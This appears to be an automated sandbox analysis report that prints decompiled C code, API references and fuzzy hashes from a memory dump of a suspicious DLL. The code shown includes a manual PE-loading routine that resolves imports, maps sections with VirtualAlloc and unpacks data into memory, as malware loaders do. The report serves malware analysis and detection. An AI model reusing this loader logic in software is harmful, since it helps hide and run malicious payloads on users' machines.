                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                    			E1001ABA3() {
                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                    				signed int _t106;
                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                    				void* _t116;
                                                                                                                                                                    				void* _t121;
                                                                                                                                                                    				void* _t127;
                                                                                                                                                                    				signed int _t173;
                                                                                                                                                                    				void* _t180;
                                                                                                                                                                    				void* _t181;
                                                                                                                                                                    				void* _t182;
                                                                                                                                                                    				void* _t184;
                                                                                                                                                                    				void* _t186;
                                                                                                                                                                    				void* _t187;
                                                                                                                                                                    
                                                                                                                                                                    				L0:
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					L0:
                                                                                                                                                                    					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
                                                                                                                                                                    					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					L3:
                                                                                                                                                                    					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                    					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
                                                                                                                                                                    					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
                                                                                                                                                                    					_t186 = _t184 + 8;
                                                                                                                                                                    					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
                                                                                                                                                                    					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
                                                                                                                                                                    						L5:
                                                                                                                                                                    						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                                    						_push(4 +  *_t17 * 4);
                                                                                                                                                                    						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                                    						_push( *_t21);
                                                                                                                                                                    						_t99 = E1000E018(_t127,  *_t21, _t180, _t181, __eflags);
                                                                                                                                                                    						_t187 = _t186 + 8;
                                                                                                                                                                    						 *(_t182 - 0x18) = _t99;
                                                                                                                                                                    						__eflags =  *(_t182 - 0x18);
                                                                                                                                                                    						if( *(_t182 - 0x18) != 0) {
                                                                                                                                                                    							L7:
                                                                                                                                                                    							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
                                                                                                                                                                    							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                                    							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                                    							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
                                                                                                                                                                    							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                                    							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
                                                                                                                                                                    							__eflags =  *( *(_t182 - 4));
                                                                                                                                                                    							if( *( *(_t182 - 4)) == 0) {
                                                                                                                                                                    								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                                    								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                                    								__eflags = _t106;
                                                                                                                                                                    								 *(_t182 - 0x14) = _t106;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
                                                                                                                                                                    								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                                    							}
                                                                                                                                                                    							while(1) {
                                                                                                                                                                    								L12:
                                                                                                                                                                    								__eflags =  *( *(_t182 - 0x1c));
                                                                                                                                                                    								if( *( *(_t182 - 0x1c)) == 0) {
                                                                                                                                                                    									break;
                                                                                                                                                                    								}
                                                                                                                                                                    								L13:
                                                                                                                                                                    								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
                                                                                                                                                                    								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
                                                                                                                                                                    									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
                                                                                                                                                                    									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                    									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
                                                                                                                                                                    									__eflags = _t114;
                                                                                                                                                                    									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                                    									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
                                                                                                                                                                    									_t187 = _t187 + 0xc;
                                                                                                                                                                    									 *( *(_t182 - 0x14)) = _t116;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                                    									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
                                                                                                                                                                    									_t187 = _t187 + 0xc;
                                                                                                                                                                    									 *( *(_t182 - 0x14)) = _t121;
                                                                                                                                                                    								}
                                                                                                                                                                    								L16:
                                                                                                                                                                    								__eflags =  *( *(_t182 - 0x14));
                                                                                                                                                                    								if( *( *(_t182 - 0x14)) != 0) {
                                                                                                                                                                    									L18:
                                                                                                                                                                    									L11:
                                                                                                                                                                    									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
                                                                                                                                                                    									_t173 =  *(_t182 - 0x14) + 4;
                                                                                                                                                                    									__eflags = _t173;
                                                                                                                                                                    									 *(_t182 - 0x14) = _t173;
                                                                                                                                                                    									continue;
                                                                                                                                                                    								} else {
                                                                                                                                                                    									L17:
                                                                                                                                                                    									 *(_t182 - 0xc) = 0;
                                                                                                                                                                    								}
                                                                                                                                                                    								break;
                                                                                                                                                                    							}
                                                                                                                                                                    							L19:
                                                                                                                                                                    							__eflags =  *(_t182 - 0xc);
                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                    								L21:
                                                                                                                                                                    								continue;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								L20:
                                                                                                                                                                    								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                    								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                                    								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
                                                                                                                                                                    								SetLastError(0x7f);
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							L6:
                                                                                                                                                                    							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                                    							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                                    							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
                                                                                                                                                                    							SetLastError(0xe);
                                                                                                                                                                    							 *(_t182 - 0xc) = 0;
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						L4:
                                                                                                                                                                    						SetLastError(0x7e);
                                                                                                                                                                    						 *(_t182 - 0xc) = 0;
                                                                                                                                                                    					}
                                                                                                                                                                    					break;
                                                                                                                                                                    				}
                                                                                                                                                                    				L22:
                                                                                                                                                                    				_t93 =  *(_t182 - 0xc);
                                                                                                                                                                    				return _t93;
                                                                                                                                                                    			}



















                                                                                                                                                                    APIs
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                                    • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                                    • _realloc.LIBCMT ref: 1001AC1B
                                                                                                                                                                    • SetLastError.KERNEL32(0000000E), ref: 1001AC44
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Read_realloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 252108943-0
                                                                                                                                                                    • Opcode ID: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                                    • Instruction ID: fc8650bffc04b339d430b1508d1055308318352e03b6944bc6f0970fdcc69cd6
                                                                                                                                                                    • Opcode Fuzzy Hash: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                                    • Instruction Fuzzy Hash: B501EF74A00208EFDB04CF94C985B9DB7B1FF49359F608198E90AAB350C378EA81DB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                    			E1001B300(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				intOrPtr _t82;
                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                    				void* _t100;
                                                                                                                                                                    				void* _t140;
                                                                                                                                                                    				void* _t141;
                                                                                                                                                                    				void* _t142;
                                                                                                                                                                    				void* _t143;
                                                                                                                                                                    				void* _t144;
                                                                                                                                                                    				void* _t145;
                                                                                                                                                                    
                                                                                                                                                                    				_t141 = __esi;
                                                                                                                                                                    				_t140 = __edi;
                                                                                                                                                                    				_t100 = __ebx;
                                                                                                                                                                    				_t2 = _a16 + 4; // 0xe90575c0
                                                                                                                                                                    				_v20 =  *_t2;
                                                                                                                                                                    				_t6 =  *_a16 + 0x14; // 0x2b34508b
                                                                                                                                                                    				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b95d
                                                                                                                                                                    				_v24 =  *_a16 + _t8;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				while(1) {
                                                                                                                                                                    					_t16 =  *_a16 + 6; // 0xe2e905
                                                                                                                                                                    					if(_v8 >= ( *_t16 & 0x0000ffff)) {
                                                                                                                                                                    						break;
                                                                                                                                                                    					}
                                                                                                                                                                    					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
                                                                                                                                                                    						_t44 = _v24 + 0x14; // 0x2b34508b
                                                                                                                                                                    						_t46 = _v24 + 0x10; // 0xb04d8b02
                                                                                                                                                                    						_t78 = E1001AE40(_a8,  *_t44 +  *_t46);
                                                                                                                                                                    						_t143 = _t142 + 8;
                                                                                                                                                                    						if(_t78 != 0) {
                                                                                                                                                                    							_t49 = _a16 + 0x34; // 0x8b0aeb18
                                                                                                                                                                    							_t51 = _v24 + 0x10; // 0xb04d8b02
                                                                                                                                                                    							_t54 = _v24 + 0xc; // 0x8bb8558b
                                                                                                                                                                    							_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
                                                                                                                                                                    							_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
                                                                                                                                                                    							_t144 = _t143 + 0x14;
                                                                                                                                                                    							_v12 = _t82;
                                                                                                                                                                    							if(_v12 != 0) {
                                                                                                                                                                    								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                    								E1000D190(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
                                                                                                                                                                    								_t142 = _t144 + 0xc;
                                                                                                                                                                    								 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                    								L1:
                                                                                                                                                                    								_v8 = _v8 + 1;
                                                                                                                                                                    								_v24 = _v24 + 0x28;
                                                                                                                                                                    								continue;
                                                                                                                                                                    							}
                                                                                                                                                                    							return 0;
                                                                                                                                                                    						}
                                                                                                                                                                    						return 0;
                                                                                                                                                                    					}
                                                                                                                                                                    					_v16 =  *((intOrPtr*)(_a12 + 0x38));
                                                                                                                                                                    					if(_v16 <= 0) {
                                                                                                                                                                    						L8:
                                                                                                                                                                    						goto L1;
                                                                                                                                                                    					}
                                                                                                                                                                    					_t25 = _a16 + 0x34; // 0x8b0aeb18
                                                                                                                                                                    					_t29 = _v24 + 0xc; // 0x8bb8558b
                                                                                                                                                                    					_t31 = _a16 + 0x1c; // 0x8b1874b4
                                                                                                                                                                    					_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
                                                                                                                                                                    					_t145 = _t142 + 0x14;
                                                                                                                                                                    					_v12 = _t95;
                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                    						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                    						 *((intOrPtr*)(_v24 + 8)) = _v12;
                                                                                                                                                                    						E1000CF20(_t140, _v12, 0, _v16);
                                                                                                                                                                    						_t142 = _t145 + 0xc;
                                                                                                                                                                    						goto L8;
                                                                                                                                                                    					}
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}



















                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2102423945-0
                                                                                                                                                                    • Opcode ID: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                                    • Instruction ID: a005275a1ccb32e2261c4421282f910c29d49b3246cd882dcb7603a91dee7caf
                                                                                                                                                                    • Opcode Fuzzy Hash: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 7951A7B4A0010ADFCB04DF94D991EAEB7B5FF48304F248599E915AB346D730EE91CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001AAF0(void* __ecx, CHAR* _a4) {
                                                                                                                                                                    				struct HINSTANCE__* _v8;
                                                                                                                                                                    				struct HINSTANCE__* _t6;
                                                                                                                                                                    
                                                                                                                                                                    				_t6 = LoadLibraryA(_a4); // executed
                                                                                                                                                                    				_v8 = _t6;
                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                    					return _v8;
                                                                                                                                                                    				}
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                    • Opcode ID: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                                    • Instruction ID: 175513b2d3b99921c95d5b3868ca5ca2b884793c4c363252687910afe3f21655
                                                                                                                                                                    • Opcode Fuzzy Hash: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                                    • Instruction Fuzzy Hash: 4CD0927490924CEBCB10DFA4DA88A8EB7F8EB09251F208595FC0997201D631DE809AA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001AAC0(struct HINSTANCE__* _a4) {
                                                                                                                                                                    				int _t3;
                                                                                                                                                                    
                                                                                                                                                                    				_t3 = FreeLibrary(_a4); // executed
                                                                                                                                                                    				return _t3;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                    • Opcode ID: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                                    • Instruction ID: d41d78d4d80a0482e50fbcd51c543f3b4bec57f301915c91e4edb7b1fe7fc2cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                                    • Instruction Fuzzy Hash: E3B0123100030CBBCE005BD8E8888C53B9C96085117004000F60C83100C630F44046E4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                    				void* _t5;
                                                                                                                                                                    				void* _t13;
                                                                                                                                                                    
                                                                                                                                                                    				E10015254();
                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                    				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
                                                                                                                                                                    				return _t5;
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • ___security_init_cookie.LIBCMT ref: 1000EBD1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ___security_init_cookie
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3657697845-0
                                                                                                                                                                    • Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                    • Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
                                                                                                                                                                    • Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
                                                                                                                                                                    • Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                    			E10004520(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                    				signed char* _v56;
                                                                                                                                                                    				char _v128;
                                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                                    				void* _v136;
                                                                                                                                                                    				void* _v140;
                                                                                                                                                                    				void* _v144;
                                                                                                                                                                    				char* _v148;
                                                                                                                                                                    				char _v164;
                                                                                                                                                                    				intOrPtr _v168;
                                                                                                                                                                    				intOrPtr _v172;
                                                                                                                                                                    				intOrPtr _v176;
                                                                                                                                                                    				intOrPtr _v180;
                                                                                                                                                                    				char _v184;
                                                                                                                                                                    				char _v188;
                                                                                                                                                                    				char _v192;
                                                                                                                                                                    				intOrPtr _v196;
                                                                                                                                                                    				char _v200;
                                                                                                                                                                    				char _v204;
                                                                                                                                                                    				char _v208;
                                                                                                                                                                    				intOrPtr _v212;
                                                                                                                                                                    				char _v216;
                                                                                                                                                                    				char _v220;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                    				void* _t63;
                                                                                                                                                                    				void* _t70;
                                                                                                                                                                    				void* _t73;
                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                    				intOrPtr _t86;
                                                                                                                                                                    				intOrPtr _t96;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    				void* _t100;
                                                                                                                                                                    				void* _t102;
                                                                                                                                                                    
                                                                                                                                                                    				_t102 = __eflags;
                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                    				_t96 = _a8;
                                                                                                                                                                    				_v184 = E10004490;
                                                                                                                                                                    				_v180 = E100044C0;
                                                                                                                                                                    				_v176 = _t55;
                                                                                                                                                                    				_v172 = _t55;
                                                                                                                                                                    				_v168 = _t96;
                                                                                                                                                                    				_t97 = 0;
                                                                                                                                                                    				E100071F0();
                                                                                                                                                                    				_v216 = E100046C0;
                                                                                                                                                                    				_v212 = E100046E0;
                                                                                                                                                                    				_v200 = E100046C0;
                                                                                                                                                                    				_v196 = E100046E0;
                                                                                                                                                                    				E10007530( &_v164, 0);
                                                                                                                                                                    				_v136 = 0;
                                                                                                                                                                    				_v136 = _v216( &_v216, _t96);
                                                                                                                                                                    				_v132 = _t96;
                                                                                                                                                                    				_v148 =  &_v184;
                                                                                                                                                                    				_v140 = 0;
                                                                                                                                                                    				_v144 = 0;
                                                                                                                                                                    				E100048A0(_t102,  &_v128);
                                                                                                                                                                    				_t63 = E10006FD0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
                                                                                                                                                                    				_t100 =  &_v220 + 0x24;
                                                                                                                                                                    				if(_t63 == 0) {
                                                                                                                                                                    					_v204 = 0xffffffff;
                                                                                                                                                                    					_v208 = 0;
                                                                                                                                                                    					_v220 = 0;
                                                                                                                                                                    					_v192 = 0;
                                                                                                                                                                    					_v188 = 0;
                                                                                                                                                                    					if(( *_v56 & 0x00000080) == 0) {
                                                                                                                                                                    						_t70 = E10007010( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
                                                                                                                                                                    						_t100 = _t100 + 0x28;
                                                                                                                                                                    						if(_t70 == 0) {
                                                                                                                                                                    							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
                                                                                                                                                                    							_t97 = _t73;
                                                                                                                                                                    							if(_t97 != 0) {
                                                                                                                                                                    								_t76 = _a12;
                                                                                                                                                                    								_t107 = _t76;
                                                                                                                                                                    								_t86 = _v220;
                                                                                                                                                                    								if(_t76 != 0) {
                                                                                                                                                                    									 *_t76 = _t86;
                                                                                                                                                                    								}
                                                                                                                                                                    								E1000D190(0, _t96, _t97, _t97, _v208, _t86);
                                                                                                                                                                    								_t100 = _t100 + 0xc;
                                                                                                                                                                    								 *((char*)(_v220 + _t97)) = 0;
                                                                                                                                                                    							}
                                                                                                                                                                    							_v212( &_v216, _v208);
                                                                                                                                                                    							_t100 = _t100 + 8;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				E100048E0(_t107,  &_v128,  &_v216);
                                                                                                                                                                    				return _t97;
                                                                                                                                                                    			}






































                                                                                                                                                                    0x100045d8
                                                                                                                                                                    0x100045e5
                                                                                                                                                                    0x100045ed
                                                                                                                                                                    0x100045f1
                                                                                                                                                                    0x100045f5
                                                                                                                                                                    0x100045f9
                                                                                                                                                                    0x10004600
                                                                                                                                                                    0x10004637
                                                                                                                                                                    0x1000463c
                                                                                                                                                                    0x10004641
                                                                                                                                                                    0x10004653
                                                                                                                                                                    0x10004659
                                                                                                                                                                    0x1000465d
                                                                                                                                                                    0x1000465f
                                                                                                                                                                    0x10004666
                                                                                                                                                                    0x10004668
                                                                                                                                                                    0x1000466c
                                                                                                                                                                    0x1000466e
                                                                                                                                                                    0x1000466e
                                                                                                                                                                    0x10004677
                                                                                                                                                                    0x10004680
                                                                                                                                                                    0x10004683
                                                                                                                                                                    0x10004683
                                                                                                                                                                    0x10004690
                                                                                                                                                                    0x10004694
                                                                                                                                                                    0x10004694
                                                                                                                                                                    0x10004641
                                                                                                                                                                    0x10004600
                                                                                                                                                                    0x100046a1
                                                                                                                                                                    0x100046b4

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004653
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                                    • Instruction ID: 5f3268faf400ee4384dde952e7e6cf138bea3fab27ca3dfaa28aee59be70a859
                                                                                                                                                                    • Opcode Fuzzy Hash: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
                                                                                                                                                                    • Instruction Fuzzy Hash: BB4119B6408341AFD310CF55D88099BBBE8FBC8294F404E1EF59983255EB71E909CBA7
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1001AB20(void* _a4, long _a8, long _a12) {
                                                                                                                                                                    				int _t5;
                                                                                                                                                                    
                                                                                                                                                                    				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                                                                                    				return _t5;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNELBASE(?,?,?), ref: 1001AB2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
